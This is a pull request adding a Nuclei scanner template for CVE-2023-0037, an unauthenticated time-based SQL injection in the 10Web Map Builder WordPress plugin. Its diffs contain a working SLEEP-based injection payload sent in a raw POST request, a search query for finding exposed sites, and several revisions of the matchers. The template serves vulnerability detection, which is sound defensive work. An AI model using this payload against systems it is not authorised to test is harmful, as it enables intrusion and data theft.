### PR TITLE
Add CVE-2023-0037 (vKEV)

### DIFF
--- a/http/cves/2023/CVE-2023-0037.yaml
+++ b/http/cves/2023/CVE-2023-0037.yaml
@@ -1,0 +1,32 @@
+id: CVE-2023-0037
+
+info:
+  name: WordPress 10Web Map Builder < 1.0.73 - Unauthenticated SQL Injection
+  author: riteshs4hu
+  severity: critical
+  description: |
+    The 10Web Map Builder (wd-google-maps) plugin for WordPress before 1.0.73 does not properly sanitize parameters passed to its map endpoints, leading to unauthenticated time-based SQL injection.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-0037
+    - https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
+  classification:
+    cwe-id: CWE-89
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.6
+  metadata:
+    max-request: 1
+  tags: cve23,wp,sqli,unauth
+
+http:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km
+
+    matchers:
+      - type: dsl
+        dsl:
+          - duration>=3 && duration<=7

--- a/http/cves/2023/CVE-2023-0037.yaml
+++ b/http/cves/2023/CVE-2023-0037.yaml
@@ -5,28 +5,44 @@ info:
   author: riteshs4hu
   severity: critical
   description: |
-    The 10Web Map Builder (wd-google-maps) plugin for WordPress before 1.0.73 does not properly sanitize parameters passed to its map endpoints, leading to unauthenticated time-based SQL injection.
+    The 10Web Map Builder for Google Maps WordPress plugin before 1.0.73 does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
+  remediation: Fixed in 1.0.73
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-0037
     - https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/
+    - https://bulletin.iese.de/post/wd-google-maps_1-0-72_1
   classification:
-    cwe-id: CWE-89
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 8.6
+    cvss-score: 9.8
+    cve-id: CVE-2023-0037
+    cwe-id: CWE-89
+    epss-score: 0.0042
+    epss-percentile: 0.61044
+    cpe: cpe:2.3:a:10web:map_builder_for_google_maps:*:*:*:*:*:wordpress:*:*
   metadata:
+    verified: true
     max-request: 1
-  tags: cve23,wp,sqli,unauth
+    vendor: 10web
+    product: map_builder_for_google_maps
+    framework: wordpress
+    zoomeye-query: http.body="wp-content/plugins/wd-google-maps"
+  tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based
 
 http:
   - raw:
       - |
+        @timeout: 15s
         POST / HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km
+        radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&lat=0.0&lng=0.0&distance_in=km
 
     matchers:
       - type: dsl
         dsl:
-          - duration>=3 && duration<=7
+          - 'duration>=7'
+          - 'status_code == 200'
+          - 'contains(body, "wd-google-maps")'
+          - 'contains(content_type, "text/html")'
+        condition: and

--- a/http/cves/2023/CVE-2023-0037.yaml
+++ b/http/cves/2023/CVE-2023-0037.yaml
@@ -42,7 +42,6 @@ http:
       - type: dsl
         dsl:
           - 'duration>=7'
-          - 'status_code == 200'
           - 'contains(body, "wd-google-maps")'
           - 'contains(content_type, "text/html")'
         condition: and


### PR DESCRIPTION
The 10Web Map Builder (wd-google-maps) plugin for WordPress before 1.0.73 does not properly sanitize parameters passed to its map endpoints, leading to unauthenticated time-based SQL injection.

- References: https://wpscan.com/vulnerability/33ab1fe2-6611-4f43-91ba-52c56f02ed56/

### Template Validation

I've validated this template locally.
- [x] YES
- [ ] NO

[debug.txt](https://github.com/user-attachments/files/22260399/debug.txt)



### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)